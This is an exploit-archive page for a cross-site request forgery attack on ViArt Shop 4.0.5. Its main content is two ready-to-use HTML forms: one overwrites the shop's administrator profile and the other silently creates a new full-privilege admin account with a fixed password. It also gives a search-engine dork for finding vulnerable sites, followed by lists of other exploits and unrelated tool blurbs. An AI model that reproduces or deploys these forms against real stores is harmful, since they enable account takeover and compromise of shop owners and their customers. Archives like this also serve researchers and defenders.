Menu

Search for hundreds of thousands of exploits

"ViArt Shop 4.0.5 - Cross-Site Request Forgery"

Author

Exploit author

Or4nG.M4N

Platform

Exploit platform

php

Release date

Exploit published date

2011-01-15

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
+-------------------------------------------------------------------------+
# Software      : viart shop 4.0.5                                                                                                                             
# Author        : Or4nG.M4N                                               
# Date          : n/a    
# Dork          : inurl:"powered by viart shop 4.0.5"   
# Software Link : http://www.viart.com/                                                                                     
+-------------------------------------------------------------------------+
  +---+[CSRF Change Admin Password by OR4NG.M4N]+---+
<HTML>
<HEAD>
<TITLE>[#] Exploit [#]</TITLE>
<BODY dir=rtl background="" aLink=#ff0000 link=#0000ff bgColor=#ffffff text=#000000 vLink=#800080>
<P align=center>
<STRONG><FONT size=5 face=Verdana><FONT color=#00c000>ViArt</FONT> CSRF </FONT></STRONG></P>
</BODY>
</HTML>
<form action="http://localhost/vert/admin/admin_admin.php" name="record" method="POST">
<input name="operation" value="save" type="hidden">
<input name="admin_id" value="1" type="hidden">
<input name="is_hidden" id="is_hidden" value="1" type="hidden">
<input class="field" size="60" name="admin_name" value="root" type="hidden">
<input class="field" size="60" name="nickname" value="root" type="hidden">
<input class="field" size="60" maxlength="255" name="personal_image" value="FucK" type="hidden"> 
<input class="field" size="60" maxlength="8" name="admin_alias" value="Fuc1K" type="hidden">
<P align=center><select name="privilege_id"  >
<option selected="selected" value="1">
<input class="field" size="60" name="email" value="priv8te@hotmail.com" type="hidden">
<input cols="60" rows="5" value="Or4nG.M4N" name="signature" type="hidden" >
<span class="button"><input class="submit" value="Update" onclick="document.record.operation.value='save'" type="submit"></span>
  +---+[CSRF Add Admin Acuonnt by OR4NG.M4N]+---+
<HTML>
<HEAD>
<TITLE>[#] Exploit [#]</TITLE>
<BODY dir=rtl background="" aLink=#ff0000 link=#0000ff bgColor=#ffffff text=#000000 vLink=#800080>
<P align=center>
<STRONG><FONT size=5 face=Verdana><FONT color=#00c000>ViArt</FONT> CSRF </FONT></STRONG></P>
</BODY>
</HTML>
<form action="http://localhost/vert/admin/admin_admin.php" name="record" method="POST">
<input name="operation" value="save" type="hidden">
<input name="admin_id" value="2" type="hidden">
<table border="0" cellpadding="4" cellspacing="1" width="100%">
<input class="field" size="30" name="login" value="root1" type="hidden">
<input class="field" size="30" name="password" value="root1" type="hidden">
<input class="field" size="30" name="confirm" value="root1" type="hidden"> 
<input name="is_hidden" id="is_hidden" value="1" type="hidden">
<input class="field" size="60" name="admin_name" value="root1" type="hidden">
<input class="field" size="60" name="nickname" value="root1" type="hidden">
<input class="field" size="60" maxlength="8" name="admin_alias" value="Or4nG.M4n" type="hidden">
<P align=center><select name="privilege_id"  >
<option selected="selected" value="1">
<input class="field" size="60" name="email" value="priv8te@hotmail.com" type="hidden">
<input cols="60" rows="5" name="signature" value="Or4nG.M4N" type="hidden" >
<span class="button"><input class="submit" value="Add New" onclick="document.record.operation.value='save'" type="submit"></span>

#-----------------------------------#
|  by Or4nG.M4n | Th3 r34L H4ck3r   |
|        priv8te@hotmail.com        |
|    THNKS 2 : SarBoT511 . i-HmX    |
|     SadHaCk3r . The Injector      |
|     Lagripe-Dz . FoX Hacker       |
#-----------------------------------#
 www.Sec4Ever.Com | www.v4-team.com
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-01-16 "Online Book Store 1.0 - Arbitrary File Upload" webapps php Or4nG.M4N
2012-01-30 "4Images 1.7.6-9 - Cross-Site Request Forgery / PHP Code Injection" webapps php Or4nG.M4N
2012-01-22 "MiniCMS 1.0/2.0 - PHP Code Injection" webapps php Or4nG.M4N
2012-01-21 "PHP iReport 1.0 - Remote Html Code Injection" webapps php Or4nG.M4N
2012-01-21 "iSupport 1.x - Cross-Site Request Forgery / HTML Code Injection (Add Admin)" webapps php Or4nG.M4N
2012-01-16 "PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities" webapps php Or4nG.M4N
2012-01-10 "Pragyan CMS 3.0 - Remote File Disclosure" webapps php Or4nG.M4N
2011-11-03 "Jara 1.6 - Multiple Vulnerabilities" webapps php Or4nG.M4N
2011-07-09 "Portix-CMS 1.5.0. rc5 - Local File Inclusion" webapps php Or4nG.M4N
2011-01-15 "ViArt Shop 4.0.5 - Cross-Site Request Forgery" webapps php Or4nG.M4N
2010-11-19 "Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)" webapps php Or4nG.M4N
2010-11-19 "PHPGallery 1.1.0 - Cross-Site Request Forgery" webapps php Or4nG.M4N
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.